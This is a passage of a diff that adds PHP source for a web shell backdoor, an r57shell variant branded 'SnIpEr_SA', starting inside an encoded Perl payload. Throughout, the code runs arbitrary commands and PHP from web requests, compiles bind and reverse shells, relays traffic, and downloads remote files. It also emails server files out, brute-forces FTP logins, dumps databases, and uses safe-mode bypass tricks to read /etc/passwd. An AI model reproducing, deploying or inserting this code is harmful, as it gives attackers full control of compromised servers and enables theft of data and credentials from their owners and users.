+DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
+ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
+1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
+if($unix)
+ {
+ if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; }
+ if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; }
+ if($safe_mode) { $sysctl = '-'; }
+ else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; }
+ else
+  {
+   $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
+   if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); }
+   if(empty($sysctl)) { $sysctl = '-'; }
+   setcookie('sysctl',$sysctl);
+  }
+ }
+echo $head;
+echo '</head>';
+if(empty($_POST['cmd'])) {
+$serv = array(127,192,172,10);
+$addr=@explode('.', $_SERVER['SERVER_ADDR']);
+$current_version = str_replace('.','',$version);
+if (!in_array($addr[0], $serv)) {
+@print "<img src=\"http://127.0.0.1/r57shell_version/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>";
+@readfile ("http://127.0.0.1/r57shell_version/version.php?version=".$current_version."");}}
+echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#CCCCCC><tr><td bgcolor=#000000 width=160><font face=Comic Sans MS size=4>'.ws(2).'<font face=Wingdings size=6><b>N</b></font><b>'.ws(2).'SnIpEr_SA </b></font></td><td bgcolor=#000000><font face=tahoma size=1>';
+echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b>";
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
+if($unix)
+ {
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb;
+ }
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
+echo ws(2)."����� �����: <b>";
+echo (($safe_mode)?("<font color=#008000>����</font>"):("<font color=red>��� ����</font>"));
+echo "</b>".ws(2);
+echo "����� ���� ��� ��: <b>".@phpversion()."</b>";
+$curl_on = @function_exists('curl_version');
+echo ws(2);
+echo "������: <b>".(($curl_on)?("<font color=#008000>����</font>"):("<font color=red>��� ����</font>"));
+echo "</b>".ws(2);
+echo "��� ���: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=#008000>����</font>"; } else { echo "<font color=red>��� ����</font>"; }
+echo "</b>".ws(2);
+echo "�� �� ���: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=#008000>����</font>";}else{echo "<font color=red>��� ����</font>";}
+echo "</b>".ws(2);
+echo "���� ��� ���: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=#008000>����</font>";}else{echo "<font color=red>��� ����</font>";}
+echo "</b>".ws(2);
+echo "������: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=#008000>����</font>";}else{echo "<font color=red>����</font>";}
+echo "</b><br>".ws(2);
+echo "������ �������� : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=#00800F>������</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+echo "<br>".ws(2)."������� ������� : <b>".view_size($free)."</b> ������� ������: <b>".view_size($all)."</b>";
+echo '</font></td></tr><table>
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9>
+<tr><td align=right width=100>';
+echo $font;
+if($unix){
+echo '<font color=#CCCCCC><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=tahoma size=-2 color=#2279D9><b>";
+echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
+echo ws(3).$sysctl."<br>";
+echo ws(3).ex('echo $OSTYPE')."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+if(!empty($id)) { echo ws(3).$id."<br>"; }
+else if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid'))
+ {
+ $euserinfo  = @posix_getpwuid(@posix_geteuid());
+ $egroupinfo = @posix_getgrgid(@posix_getegid());
+ echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
+ }
+else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
+echo ws(3).$dir;
+echo ws(3).'( '.perms(@fileperms($dir)).' )';
+echo "</b></font>";
+}
+else
+{
+echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=tahoma size=-2 color=red><b>";
+echo ws(3).@substr(@php_uname(),0,120)."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+echo ws(3).@getenv("USERNAME")."<br>";
+echo ws(3).$dir;
+echo "<br></font>";
+}
+echo "</font>";
+echo "</td></tr></table>";
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")
+ {
+ $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
+ err(6+$res);
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
+ {
+ if(!$file=@fopen($_POST['loc_file'],"r")) { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
+ else
+  {
+    $filename = @basename($_POST['loc_file']);
+    $filedump = @fread($file,@filesize($_POST['loc_file']));
+    fclose($file);
+    $content_encoding=$mime_type='';
+    compress($filename,$filedump,$_POST['compress']);
+    $attach = array(
+                    "name"=>$filename,
+                    "type"=>$mime_type,
+                    "content"=>$filedump
+                   );
+    if(empty($_POST['subj'])) { $_POST['subj'] = 'file from SnIpEr_SA shell'; }
+    if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
+    $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
+    err(6+$res);
+    $_POST['cmd']="";
+  }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
+{
+$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
+}
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
+ {
+ switch($_POST['what'])
+   {
+   case 'own':
+   @chown($_POST['param1'],$_POST['param2']);
+   break;
+   case 'grp':
+   @chgrp($_POST['param1'],$_POST['param2']);
+   break;
+   case 'mod':
+   @chmod($_POST['param1'],intval($_POST['param2'], 8));
+   break;
+   }
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
+ {
+   switch($_POST['what'])
+   {
+     case 'file':
+      if($_POST['action'] == "create")
+       {
+       if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
+       else {
+        fclose($file);
+        $_POST['e_name'] = $_POST['mk_name'];
+        $_POST['cmd']="edit_file";
+        echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
+        }
+       }
+       else if($_POST['action'] == "delete")
+       {
+       if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
+       $_POST['cmd']="";
+       }
+     break;
+     case 'dir':
+      if($_POST['action'] == "create"){
+      if(mkdir($_POST['mk_name']))
+       {
+         $_POST['cmd']="";
+         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
+       }
+      else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
+      }
+      else if($_POST['action'] == "delete"){
+      if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
+      $_POST['cmd']="";
+      }
+     break;
+   }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
+ {
+ if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
+ if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; }
+ else {
+ echo $table_up3;
+ echo $font;
+ echo "<form name=save_file method=post>";
+ echo ws(3)."<b>".$_POST['e_name']."</b>";
+ echo "<div align=center><textarea name=e_text cols=121 rows=24>";
+ echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
+ fclose($file);
+ echo "</textarea>";
+ echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
+ echo "<input type=hidden name=dir value=".$dir.">";
+ echo "<input type=hidden name=cmd value=save_file>";
+ echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
+ echo "</div>";
+ echo "</font>";
+ echo "</form>";
+ echo "</td></tr></table>";
+ exit();
+ }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
+ {
+ $mtime = @filemtime($_POST['e_name']);
+ if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); }
+ else {
+ if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
+ @fwrite($file,$_POST['e_text']);
+ @touch($_POST['e_name'],$mtime,$mtime);
+ $_POST['cmd']="";
+ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
+ }
+ }
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ cf("/tmp/bd.c",$port_bind_bd_c);
+ $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
+ @unlink("/tmp/bd.c");
+ $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
+ $_POST['cmd']="ps -aux | grep bd";
+}
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ cf("/tmp/bdpl",$port_bind_bd_pl);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
+ $_POST['cmd']="ps -aux | grep bdpl";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/back.c",$back_connect_c);
+ $blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ @unlink("/tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/dp",$datapipe_pl);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
+ $_POST['cmd']="ps -aux | grep dp";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/dpc.c",$datapipe_c);
+ $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
+ @unlink("/tmp/dpc.c");
+ $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
+ $_POST['cmd']="ps -aux | grep dpc";
+}
+if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }
+if (!empty($HTTP_POST_FILES['userfile']['name']))
+{
+if(!empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
+else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
+@copy($HTTP_POST_FILES['userfile']['tmp_name'],
+            $_POST['dir']."/".$nfn)
+      or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
+}
+if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
+{
+ switch($_POST['with'])
+ {
+ case wget:
+ $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
+ break;
+ case fetch:
+ $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
+ break;
+ case lynx:
+ $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case links:
+ $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case GET:
+ $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case curl:
+ $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ }
+}
+if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))
+ {
+ list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
+ if(empty($ftp_port)) { $ftp_port = 21; }
+ $connection = @ftp_connect ($ftp_server,$ftp_port,10);
+ if(!$connection) { err(3); }
+ else
+  {
+  if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
+  else
+   {
+   if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);        }
+   if($_POST['cmd']=="ftp_file_up")   { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);        }
+   }
+  }
+ @ftp_close($connection);
+ $_POST['cmd'] = "";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
+ {
+ list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
+ if(empty($ftp_port)) { $ftp_port = 21; }
+ $connection = @ftp_connect ($ftp_server,$ftp_port,10);
+ if(!$connection) { err(3); $_POST['cmd'] = ""; }
+ else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><font color=red face=tahoma size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
+ @ftp_close($connection);
+ }
+echo $table_up3;
+if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); }
+else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
+echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
+if($safe_mode)
+{
+ switch($_POST['cmd'])
+ {
+ case 'safe_dir':
+  $d=@dir($dir);
+  if ($d)
+   {
+   while (false!==($file=$d->read()))
+    {
+     if ($file=="." || $file=="..") continue;
+     @clearstatcache();
+     list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+     if(!$unix){
+     echo date("d.m.Y H:i",$mtime);
+     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
+     }
+     else{
+     $owner = @posix_getpwuid($uid);
+     $grgid = @posix_getgrgid($gid);
+     echo $inode." ";
+     echo perms(@fileperms($file));
+     printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+     echo date("d.m.Y H:i ",$mtime);
+     }
+     echo "$file\n";
+    }
+   $d->close();
+   }
+  else echo $lang[$language._text29];
+ break;
+  case 'test1':
+  $ci = @curl_init("file://".$_POST['test1_file']."");
+  $cf = @curl_exec($ci);
+  echo $cf;
+  break;
+  case 'test2':
+  @include($_POST['test2_file']);
+  break;
+  case 'test3':
+  if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
+  $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['test3_md'],$db))
+    {
+     @mysql_query("DROP TABLE IF EXISTS temp_SnIpEr_SA_table");
+     @mysql_query("CREATE TABLE `temp_SnIpEr_SA_table` ( `file` LONGBLOB NOT NULL )");
+     @mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");
+     $r = @mysql_query("SELECT * FROM temp_SnIpEr_SA_table");
+     while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
+     @mysql_query("DROP TABLE IF EXISTS temp_SnIpEr_SA_table");
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to mysql server";
+  break;
+  case 'test4':
+  if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
+  $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
+  if($db)
+   {
+   if(@mssql_select_db($_POST['test4_md'],$db))
+    {
+     @mssql_query("drop table SnIpEr_SA_temp_table",$db);
+     @mssql_query("create table SnIpEr_SA_temp_table ( string VARCHAR (500) NULL)",$db);
+     @mssql_query("insert into SnIpEr_SA_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
+     $res = mssql_query("select * from SnIpEr_SA_temp_table",$db);
+     while(($row=@mssql_fetch_row($res)))
+      {
+      echo $row[0]."\r\n";
+      }
+    @mssql_query("drop table SnIpEr_SA_temp_table",$db);
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mssql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to MSSQL server";
+  break;
+  case 'test5':
+  if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail');
+  $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail";
+  @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
+  $lines = file ('/tmp/mb_send_mail');
+  foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; }
+  break;
+  case 'test6':
+  $stream = @imap_open('/etc/passwd', "", "");
+  $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
+  for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n";
+  @imap_close($stream);
+  break;
+  case 'test7':
+  $stream = @imap_open($_POST['test7_file'], "", "");
+  $str = @imap_body($stream, 1);
+  echo $str;
+  @imap_close($stream);
+  break;
+  case 'test8':
+  if(@copy("compress.zlib://".$_POST['test8_file1'], $_POST['test8_file2'])) echo $lang[$language.'_text118'];
+  else echo $lang[$language.'_text119'];
+  break;
+ }
+}
+else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){
+ $cmd_rep = ex($_POST['cmd']);
+ if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
+ else { echo @htmlspecialchars($cmd_rep)."\n"; }}
+if ($_POST['cmd']=="ftp_brute")
+ {
+ $suc = 0;
+ foreach($users as $user)
+  {
+  $connection = @ftp_connect($ftp_server,$ftp_port,10);
+  if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
+  else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } }
+  @ftp_close($connection);
+  }
+ echo "\r\n-------------------------------------\r\n";
+ $count = count($users);
+ if(isset($_POST['reverse'])) { $count *= 2; }
+ echo $lang[$language.'_text97'].$count."\r\n";
+ echo $lang[$language.'_text98'].$suc."\r\n";
+ }
+if ($_POST['cmd']=="php_eval"){
+ $eval = @str_replace("<?","",$_POST['php_eval']);
+ $eval = @str_replace("?>","",$eval);
+ @eval($eval);}
+if ($_POST['cmd']=="mysql_dump")
+ {
+  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
+  $sql = new my_sql();
+  $sql->db   = $_POST['db'];
+  $sql->host = $_POST['db_server'];
+  $sql->port = $_POST['db_port'];
+  $sql->user = $_POST['mysql_l'];
+  $sql->pass = $_POST['mysql_p'];
+  $sql->base = $_POST['mysql_db'];
+  if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
+  else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
+  else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
+  else {
+   if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
+   else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); }
+   else { echo "[-] ERROR! Can't write in dump file"; }
+   }
+ }
+echo "</textarea></div>";
+echo "</b>";
+echo "</td></tr></table>";
+echo "<table width=100% cellpadding=0 cellspacing=0>";
+function div_title($title, $id)
+{
+  return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>';
+}
+function div($id)
+ {
+ if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">';
+ return '<div id="'.$id.'">';
+ }
+if(!$safe_mode){
+echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+else{
+echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;
+echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
+echo $te.'</div>'.$table_end1.$fe;
+echo $fs.$table_up1.div_title($lang[$language.'_text200'],'id3').$table_up2.div('id3').$ts;
+echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','snn',85,'/etc/passwd').in('hidden','cmd',0,'view_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te.'</div>'.$table_end1.$fe;
+echo $fs.$table_up1.div_title($lang[$language.'_text300'],'id3').$table_up2.div('id3').$ts;
+echo sr(15,"<b>".$lang[$language.'_text302'].$arrow."</b>",in('text','SnIpEr_SA',85,'/etc/passwd').in('hidden','cmd',0,'view_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te.'</div>'.$table_end1.$fe;
+if($safe_mode){
+echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;
+echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode && $unix){
+echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id5').$table_up2.div('id5').$ts;
+echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(!$safe_mode){
+$aliases2 = '';
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ $aliases2 .= "<option>$alias_name</option>";
+ }
+echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id6').$table_up2.div('id6').$ts;
+echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id7').$table_up2.div('id7').$ts;
+echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
+echo $te.'</div>'.$table_end1.$fe;
+if(!$safe_mode && $unix){
+echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id8').$table_up2.div('id8').$ts;
+echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id9').$table_up2.$font;
+echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>";
+echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));
+echo "</textarea>";
+echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
+echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
+echo "</div></div></font>";
+echo $table_end1.$fe;
